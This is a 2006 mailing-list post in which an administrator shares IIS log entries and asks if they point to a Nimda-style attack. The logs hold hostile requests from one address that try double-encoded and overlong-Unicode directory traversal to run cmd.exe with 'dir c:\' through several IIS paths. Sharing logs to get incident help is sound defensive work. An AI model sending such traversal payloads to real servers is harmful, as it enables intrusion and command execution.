IIS http error log entries...

Tue, 12 Dec 2006 07:52:56 -0800 

Hello list,
i hope i got the right group, 
i just found these in my IIS logs:

-----------------------

2006-12-08 11:38:18 87.17.7.5 2842 192.168.x.x 80 HTTP/1.0 HEAD 
/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\ 400 - 
URL -
2006-12-08 11:38:29 87.17.7.5 2929 192.168.x.x 80 HTTP/1.0 HEAD 
/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\ 400 - URL -
2006-12-08 11:38:44 87.17.7.5 2872 192.168.x.x 80 HTTP/1.0 HEAD 
/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\ 400 - URL -
2006-12-08 11:38:44 87.17.7.5 3420 192.168.x.x 80 HTTP/1.0 HEAD 
/Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\ 400 - URL -
2006-12-08 11:38:58 87.17.7.5 1332 192.168.x.x 80 HTTP/1.0 HEAD 
/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
 400 - URL -
2006-12-08 11:38:58 87.17.7.5 2105 192.168.x.x 80 HTTP/1.0 HEAD 
/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
 400 - URL -
2006-12-08 11:39:46 87.17.7.5 2435 192.168.x.x 80 - - - - - 
Timer_MinBytesPerSecond -
2006-12-08 11:40:36 87.17.7.5 1933 192.168.x.x 80 - - - - - 
Timer_MinBytesPerSecond -
2006-12-08 11:40:41 87.17.7.5 4144 192.168.x.x 80 - - - - - 
Timer_MinBytesPerSecond -
2006-12-08 11:40:44 87.17.7.5 4234 192.168.x.x 80 HTTP/1.0 HEAD 
/msaDC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\ 400 - URL -
2006-12-08 11:40:50 87.17.7.5 1130 192.168.x.x 80 HTTP/1.0 HEAD 
/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\ 
400 - URL -
2006-12-08 11:40:50 87.17.7.5 1411 192.168.x.x 80 HTTP/1.0 HEAD 
/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\ 400 - 
URL -
2006-12-08 11:41:11 87.17.7.5 1427 192.168.x.x 80 - - - - - 
Timer_MinBytesPerSecond -
2006-12-08 11:41:24 87.17.7.5 4715 192.168.x.x 80 HTTP/1.0 HEAD 
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
 400 - URL -
2006-12-08 11:41:35 87.17.7.5 1568 192.168.x.x 80 HTTP/1.0 HEAD 
/msadc/..%c1%pc../..%c1%pc../..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\ 400 - 
URL -
2006-12-08 11:41:41 87.17.7.5 4751 192.168.x.x 80 - - - - - 
Timer_MinBytesPerSecond -
2006-12-08 11:41:44 87.17.7.5 1595 192.168.x.x 80 HTTP/1.0 HEAD 
/msadc/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\ 400 - URL -

-------------------------

I don't have much expirience with this kind of thing, and from digging the net 
i found that this was used in Nimda attacks few years ago... any idea what's 
going on? Should i be worried?

---------------------------------------------------------------------------
---------------------------------------------------------------------------

Reply via email to